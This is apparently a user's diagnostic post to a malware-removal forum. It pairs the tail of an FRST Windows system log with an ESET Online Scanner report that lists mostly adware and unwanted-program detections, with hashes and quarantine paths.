Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_HOMESTUDENTR_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version: - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_ENTERPRISE_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version: - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_HOMESTUDENTR_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version: - Microsoft)
WEB.DE Desktop Icons (HKLM\...\1&1 Mail & Media GmbH 1und1DesktopIconsInstaller) (Version: 3.0.5.0 - 1&1 Mail & Media GmbH)
WEB.DE MailCheck für Internet Explorer (HKLM\...\1&1 Mail & Media GmbH Toolbar IE8) (Version: 2.6.0.4 - 1&1 Mail & Media GmbH)
WEB.DE Softwareaktualisierung (HKLM\...\1&1 Mail & Media GmbH 1und1Softwareaktualisierung) (Version: 3.0.1.0 - 1&1 Mail & Media GmbH)
Windows 7 Upgrade Advisor (HKLM\...\{9A4D182C-35C7-4791-8484-4304EBC9101A}) (Version: 2.0.5000.0 - Microsoft Corporation)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX control for remote connections (HKLM\...\{C5398A89-516C-4DAF-BA07-EE7949090E56}) (Version: 15.4.5722.2 - Microsoft Corporation)
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{5D39BBA0-67EE-42FE-8640-57C456AE4C8A}\InprocServer32 -> C:\Users\finja\AppData\LocalLow\WiseConvert_1.3_B2\prxtbWis0.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}\InprocServer32 -> C:\Users\finja\AppData\Local\Conduit\Community Alerts\Alert.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{F9E1BD9A-84B5-4D12-9195-0B3E7D86FD35}\InprocServer32 -> C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll No File
==================== Restore Points =========================
05-12-2014 19:07:39 Prüfpunkt von HitmanPro
05-12-2014 19:31:46 Prüfpunkt von HitmanPro
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2006-11-02 11:23 - 2014-12-06 09:03 - 00000732 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {1245B223-395D-46A5-93D1-C9AE1D55861B} - System32\Tasks\Registration 1und1 Task => C:\Program Files\1und1Softwareaktualisierung\cdsupdclient.exe [2014-03-31] (1&1 Mail & Media GmbH)
Task: {5E8F5D12-D836-4FA2-A55F-60B345663AEB} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Signature Update => c:\program files\windows defender\MpCmdRun.exe [2008-01-21] (Microsoft Corporation)
Task: {7BEF1111-7860-4E60-BC36-8822405C6078} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - finja => C:\Program Files\Windows Calendar\WinCal.exe [2009-04-11] (Microsoft Corporation)
Task: {B2DE553E-4F93-444A-B89F-264EA7144119} - System32\Tasks\1und1 Konfiguration => C:\ProgramData\1und1InternetExplorerAddon\ConfigTask.exe [2011-03-16] (1und1 Mail und Media GmbH)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Loaded Modules (whitelisted) =============
2008-07-30 05:01 - 2003-06-07 06:30 - 00057344 _____ () C:\Program Files\Launch Manager\PowerUtl.dll
2009-02-27 10:19 - 2008-06-11 11:18 - 00024576 _____ () C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe
2009-02-27 10:19 - 2009-02-27 10:19 - 00032768 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.Controller\3.0.3009.0__14bcaafdb44b5951\Framework.Model.Controller.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00009216 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.ControllerInterface\3.0.3009.0__d842b71b4d6ed079\Framework.Model.ControllerInterface.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00061440 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Library\3.0.3009.0__3036420f80dd6947\Framework.Library.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00015360 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Host\3.0.3009.0__672b450de5a7e94a\Framework.Host.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00006144 _____ () C:\Windows\assembly\GAC_MSIL\Framework.PluginInterface\3.0.3009.0__9ecdf03bb2054f94\Framework.PluginInterface.dll
2009-02-27 10:20 - 2009-02-27 10:20 - 00036864 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Utility\3.0.3009.0__4df5dcab8860d239\Framework.Utility.dll
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
========================= Accounts: ==========================
Administrator (S-1-5-21-717213786-2690546565-922636609-500 - Administrator - Disabled)
finja (S-1-5-21-717213786-2690546565-922636609-1000 - Administrator - Enabled) => C:\Users\finja
Gast (S-1-5-21-717213786-2690546565-922636609-501 - Limited - Disabled)
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (12/06/2014 05:42:55 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
System errors:
=============
Microsoft Office Sessions:
=========================
CodeIntegrity Errors:
===================================
Date: 2014-12-06 17:45:29.453
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 17:45:28.705
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 17:45:28.034
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 17:45:27.269
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 17:42:43.298
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 17:34:41.463
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 16:31:55.653
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 16:31:55.029
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 16:31:54.405
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 16:31:53.812
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
==================== Memory info ===========================
Processor: Pentium(R) Dual-Core CPU T4200 @ 2.00GHz
Percentage of memory in use: 39%
Total physical RAM: 3001.08 MB
Available physical RAM: 1807.48 MB
Total Pagefile: 6206.44 MB
Available Pagefile: 5056.82 MB
Total Virtual: 2047.88 MB
Available Virtual: 1917.1 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:288.08 GB) (Free:238.87 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 93D3AC9B)
Partition 1: (Not Active) - (Size=10 GB) - (Type=27)
Partition 2: (Active) - (Size=288.1 GB) - (Type=07 NTFS)
==================== End Of Log ============================
Code:
ATTFilter ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=9787e563c042db41b574c32595c3ea1b
# engine=21431
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2014-12-06 07:36:59
# local_time=2014-12-06 08:36:59 (+0100, Mitteleuropäische Zeit)
# country="Germany"
# lang=1031
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode_1='Microsoft Security Essentials'
# compatibility_mode=5895 16777213 100 100 6527612 112075823 0 0
# scanned=154063
# found=69
# cleaned=0
# scan_time=6532
sh=321FFA63BC10C82EBF9D52BBC8DFAD1635A7D88D ft=1 fh=6345b32e772ed437 vn="Win32/AdWare.Adpeak.F Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\003\buuoujqmrk32.exe.vir"
sh=29537B5D9E0B9006067890E1D21D0CE6F22E8A99 ft=1 fh=6e7ef67f604e413f vn="Win32/MyPCBackup.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\RegClean Pro\Cloud_Backup_Setup.exe.vir"
sh=EE0DBC090D6FC9DA0D0A84516D8D34BF1F96E196 ft=1 fh=44b5db033c27eea0 vn="Win32/MyPCBackup.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\RegClean Pro\Cloud_Backup_Setup_Intl.exe.vir"
sh=C0609E1F5D8AAAF448DE3D651ACA815A2986AB05 ft=1 fh=a2503cb71d9d5470 vn="Variante von Win32/Systweak.K evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\RegClean Pro\RCPUninstall.exe.vir"
sh=9896DAB927F232F334AAC794EE39E4741E8560AD ft=1 fh=20cdc242a13dadda vn="MSIL/AdvancedSystemProtector.D evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\RegClean Pro\systweakasp.exe.vir"
sh=B470497F7EA96F4B7447C32EBB0052D56A8F8DAF ft=1 fh=3c7e4e17a056443d vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SearchProtect\UI\bin\cltmngui.exe.vir"
sh=85FEDAE029E2FB63F3090177E7068FC8A40ABE52 ft=1 fh=caabccb7d7d354a0 vn="Variante von MSIL/BrowseFox.H evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\snipsmart\bin\utilsnipsmart.exe.vir"
sh=C7C0F42A23562AA6DCCD60326FD8CC2AA41B5448 ft=1 fh=c053642cee9f3def vn="Win32/Thinknice.B evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\DpInterface32.dll.vir"
sh=125B1C393F2104CBA08183E495C0907BFF7EDA22 ft=1 fh=ea25908c8365106f vn="Win64/Thinknice.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\DpInterface64.dll.vir"
sh=8E85792765D0E0BF52107CFF4A6620995DB19BB0 ft=1 fh=627da500ea2e265f vn="Variante von Win32/Thinknice.B evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\DpInterfacef32.dll.vir"
sh=2FCA2173F2DD16DF8F1F990170FA4479FC5D5BFC ft=1 fh=c528dd1cda99a111 vn="Variante von Win32/ELEX.AR evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\RSHP.exe.vir"
sh=6043D1ACD51FD373472020FBB748C405AAF22397 ft=1 fh=4c716dbbae6c21b9 vn="Win32/Thinknice.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\SearchProtect32.dll.vir"
sh=FF431CD8693F4045BD7BD87DBCE54B820F000FC0 ft=1 fh=16c2e1bd3fd6b7e2 vn="Win64/Thinknice.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\SearchProtect64.dll.vir"
sh=5836A5DF3860241F6B69F2292ABCE592A13689B6 ft=1 fh=a3db04555f559ea8 vn="Variante von Win32/Thinknice.C evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\SpAPPSv32.dll.vir"
sh=E97CBDBD7CFED2C58464C1ABF186520022DE5666 ft=1 fh=7a2ea5ecc33ad0e3 vn="Variante von Win64/Thinknice.C evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\SpAPPSv64.dll.vir"
sh=9DC13DB9C123270C2356ED410128E11D5ADF7C6E ft=1 fh=023ab782f0a9b07d vn="Win32/Thinknice.B evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\SupTab.dll.vir"
sh=3F8CCD9279F8D950622F536D3202CC0E44134A8E ft=1 fh=4cb693d7b46c457f vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\sweetpacks bundle uninstaller\uninstaller.exe.vir"
sh=5B5B8E23D211386BDC476070C54209D98BFD8327 ft=1 fh=c0dcf2cdc253f7be vn="Variante von MSIL/Adware.PullUpdate.H Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Browser\prompt.exe.vir"
sh=75F83D0E2071210C11B550863EC82F53D0E195A9 ft=1 fh=71573f5a1c96d142 vn="Win32/Toolbar.Conduit.AJ evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Conduit\IE\CT3300854\UninstallerUI.exe.vir"
sh=56659F7FF1F1FA7906A77228E315F65F38BCEF73 ft=1 fh=0ff759dfc352fd03 vn="Variante von Win32/ELEX.AV evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\IePluginServices\PluginService.exe.vir"
sh=2CDAC140B71911CFE8C9BB2CD7D383E11413A69A ft=1 fh=765497c44fa2b0ff vn="Variante von MSIL/Adware.PullUpdate.B Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Websteroids\Websteroids.exe.vir"
sh=0B282431D560C9CB16696F6313A29B5B2853A366 ft=1 fh=868041b6d05f6e12 vn="Variante von MSIL/Adware.PullUpdate.A Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Websteroids\WebsteroidsService.exe.vir"
sh=14ACB00F6620EF6B811532EEF5191B17733A27D7 ft=1 fh=5483cf7e3d987a9e vn="Variante von MSIL/Adware.PullUpdate.D Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Websteroids\up\2.6.80\Websteroids.exe.vir"
sh=6313485982F4C1CB08A7AB87E8D1D14A60AB8BE9 ft=1 fh=21f1bc8d1875a69a vn="Variante von MSIL/Adware.PullUpdate.A Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Websteroids\up\2.6.80\WebsteroidsService.exe.vir"
sh=E2702E15F00C3ECD2699295A34BC10AA347E56B6 ft=1 fh=a0e2dd5d83ce6880 vn="MSIL/Adware.PullUpdate.I Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Websteroids\up\2.6.80\WebsteroidsUpdate.exe.vir"
sh=663BA7DC1FEC289459257F80D8939DF1A114AE27 ft=1 fh=6ba09f8cd916608c vn="Win32/AnyProtect.E evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\AnyProtectScannerSetup.exe.vir"
sh=924549AF541A4C150B724735001C213A339A4141 ft=0 fh=0000000000000000 vn="JS/Toolbar.Crossrider.B evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\bakgmemkflciahncfpgaebpnknhejeja\1.26.74_0\extensionData\plugins\91.js.vir"
sh=04E0D3AC77C2523A75A52C4E811EA6C947A58D4E ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\ehjldlodmkdlooagebfnaghgmkfccipn\0.3.8_0\js\background.js.vir"
sh=F2A8917500E1C6B9E4ADD5299BAF66B57DD4EB63 ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\ehjldlodmkdlooagebfnaghgmkfccipn\0.3.8_0\js\bootstrap.js.vir"
sh=CE3159B58A6DFF52E43F2445A4E094B983DD0EBA ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\ehjldlodmkdlooagebfnaghgmkfccipn\0.3.8_0\js\newtab.js.vir"
sh=FD7368BFE59CB6D2E4853110A8BDE09937D30BFA ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\ehjldlodmkdlooagebfnaghgmkfccipn\0.3.8_0\js\opentab.js.vir"
sh=B72480019936ABB36AA5B818B9F05F51218A25C4 ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfkfdlcdbajamklbneflfbcmfgddmpae\0.3.6_0\js\background.js.vir"
sh=066AF5B49F45E3482CA872FD73320BBB087FE9C4 ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfkfdlcdbajamklbneflfbcmfgddmpae\0.3.6_0\js\bootstrap.js.vir"
sh=D8EE2F7EDAA1162A78F494856FFC698F3FF1BF9C ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfkfdlcdbajamklbneflfbcmfgddmpae\0.3.6_0\js\newtab.js.vir"
sh=B396F756A1205B3D31CA61D39F14AEACC3204EFA ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfkfdlcdbajamklbneflfbcmfgddmpae\0.3.6_0\js\opentab.js.vir"
sh=E8BFDBDF96696001DADA38D358E7E8A3C5853864 ft=1 fh=ab9af29a36c60173 vn="Win32/VOPackage.AR evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Temp\VOPackage.exe.vir"
sh=035411E0DFE7FCA88DED1C14C2CA77A1C9F7544A ft=1 fh=68399f6ac6ea45c5 vn="Variante von Win32/DealPly.S evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Roaming\PriceFountain\UpdateProc\UpdateTask.exe.vir"
sh=B668E1E283E9022F2A1B63A169B9D0DE5A47B9E8 ft=1 fh=dfe0ee1fe01650bd vn="Win32/Agent.WGA Trojaner" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\rcore.exe.vir"
sh=E1A2C9DA921D9DA917ADE37B872D97E732A138BD ft=1 fh=a4119be6dfe53dd8 vn="Variante von Win32/Systweak.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\roboot.exe.vir"
sh=DF2EE142FC47845C6BAB1A6458973C682FD0CFE2 ft=1 fh=2a7450f30bd5c54d vn="Variante von Win64/BrowseFox.L evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\{29302da5-1178-40ac-a178-4cb57ebcc501}t.sys.vir"
sh=4FE5DF78E7AEA9DD002366CA2055999B74BDEDE5 ft=1 fh=0fa4d303dd137a0e vn="Variante von Win64/BrowseFox.AG evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\{2e8cd9f8-615c-4de8-88d4-cb904b118f81}t.sys.vir"
sh=D25E082DE21FC96B9A67EE769C431DE569DCE9AD ft=1 fh=5a17afef7a9ed79a vn="Variante von Win64/BrowseFox.AG evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\{4627de76-5659-4dbc-90a4-d42cd39f6fc8}t.sys.vir"
sh=C04BF63D827FFF1D8F288703E33F7EE1F3CB64E8 ft=1 fh=8bcfe4dbd57c8b48 vn="Variante von Win64/BrowseFox.L evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\{7012eec1-4f37-42d4-a2cd-26727494d248}t.sys.vir"
sh=FB8E4A98C102815DADE2EED2FB63BF473D9D452D ft=1 fh=6d5e9e0d63401dde vn="Variante von Win64/BrowseFox.AG evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\{9f797875-3e17-4f05-af13-44c39bc9c2c2}t.sys.vir"
sh=DF1E5009FAB7F25A27D0E88097694CAA68702122 ft=1 fh=019c95e750afe991 vn="Variante von Win64/BrowseFox.L evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\{a6762132-8e80-4305-b1ba-2bec91757ac2}t.sys.vir"
sh=C67426D27611309BFB425F23D683A9B4C4F02E8E ft=1 fh=386401652f540e1e vn="Variante von Win64/BrowseFox.L evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\{e9bebce7-deb3-4ab9-896c-549739f208c5}t.sys.vir"
sh=C4BB77B2DC9A6B33E8AEBFE9C7E2C6E84829EBA5 ft=1 fh=69ae750a9101650e vn="Win32/Adware.Pirrit.M Anwendung" ac=I fn="C:\TDSSKiller_Quarantine\05.12.2014_20.59.56\susp0000\svc0000\tsk0000.dta"
sh=B68145D2F6F55DF129ADDDC40F0FAFD7CB0327D5 ft=1 fh=835b711f313af3f1 vn="Win32/Adware.Pirrit.O Anwendung" ac=I fn="C:\TDSSKiller_Quarantine\05.12.2014_20.59.56\susp0001\svc0000\tsk0000.dta"
sh=C4BB77B2DC9A6B33E8AEBFE9C7E2C6E84829EBA5 ft=1 fh=69ae750a9101650e vn="Win32/Adware.Pirrit.M Anwendung" ac=I fn="C:\TDSSKiller_Quarantine\05.12.2014_20.59.56\susp0002\svc0000\tsk0000.dta"
sh=C4BB77B2DC9A6B33E8AEBFE9C7E2C6E84829EBA5 ft=1 fh=69ae750a9101650e vn="Win32/Adware.Pirrit.M Anwendung" ac=I fn="C:\TDSSKiller_Quarantine\05.12.2014_20.59.56\susp0003\svc0000\tsk0000.dta"
sh=C4BB77B2DC9A6B33E8AEBFE9C7E2C6E84829EBA5 ft=1 fh=69ae750a9101650e vn="Win32/Adware.Pirrit.M Anwendung" ac=I fn="C:\TDSSKiller_Quarantine\05.12.2014_20.59.56\susp0004\svc0000\tsk0000.dta"
sh=09E15C9675BE9BCA07B4DEC76EC3E1A407EF1663 ft=1 fh=62ef96bb58c196bb vn="Win32/NetToolDetect.B evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\AppData\Local\gnuutilityUI\SrDt.exe"
sh=DDD7E789E67132CF6C5D8169B2F46E3498FCA60F ft=0 fh=0000000000000000 vn="JS/Toolbar.Crossrider.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\AppData\Roaming\MQZDOUD"
sh=9413821E4285C46DAF48156B472065FC2D763FE8 ft=0 fh=0000000000000000 vn="JS/Toolbar.Crossrider.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\AppData\Roaming\XPGILDE"
sh=E4AE331440D89E1FEF79BC1D3D88E29450C25B37 ft=1 fh=2bec508ff15ca26e vn="Win32/OutBrowse.V evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\61C.tmp"
sh=BCEB518F8911E047E9DC5B0798B2C38B4260BFA3 ft=1 fh=28814f77d171d827 vn="MSIL/AdvancedSystemProtector.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\advancedfileoptimizersetup_backup (1).exe"
sh=BCEB518F8911E047E9DC5B0798B2C38B4260BFA3 ft=1 fh=28814f77d171d827 vn="MSIL/AdvancedSystemProtector.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\advancedfileoptimizersetup_backup.exe"
sh=BCEB518F8911E047E9DC5B0798B2C38B4260BFA3 ft=1 fh=28814f77d171d827 vn="MSIL/AdvancedSystemProtector.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\advancedfileoptimizersetup_GPX.exe"
sh=907DF0456F03AEAA8E44D2D9D3CD4558BA07B2DB ft=1 fh=6012deb93b048baa vn="Variante von Win32/InstallCore.PX evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\IDM2-Win-EN (1).exe"
sh=907DF0456F03AEAA8E44D2D9D3CD4558BA07B2DB ft=1 fh=6012deb93b048baa vn="Variante von Win32/InstallCore.PX evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\IDM2-Win-EN (2).exe"
sh=907DF0456F03AEAA8E44D2D9D3CD4558BA07B2DB ft=1 fh=6012deb93b048baa vn="Variante von Win32/InstallCore.PX evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\IDM2-Win-EN (3).exe"
sh=907DF0456F03AEAA8E44D2D9D3CD4558BA07B2DB ft=1 fh=6012deb93b048baa vn="Variante von Win32/InstallCore.PX evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\IDM2-Win-EN.exe"
sh=2D2172BB03B4481B6964FB05C6FC7A5F27422ED1 ft=1 fh=b92edb2a83ce662b vn="Variante von Win32/AirAdInstaller.D evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\installer_java_German.exe"
sh=2347149F788AB332FD70BC210E2AC4E1AA4F0784 ft=1 fh=cad23859fe802684 vn="Variante von Win32/PrimeCasino.B evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\Luxury.exe"
sh=4DA0EDC68F3812EFEB956B9F0E1E22D9A48507D8 ft=1 fh=a246f2ecc8442874 vn="Win32/Systweak.D evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop (1).exe"
sh=4DA0EDC68F3812EFEB956B9F0E1E22D9A48507D8 ft=1 fh=a246f2ecc8442874 vn="Win32/Systweak.D evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop.exe"
sh=27C9BD6A05DA87C72B722534F115E411C53D2DC4 ft=1 fh=dd66c373406c8aae vn="Win32/Systweak.K evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\tamnsp_26100739511631607.exe"
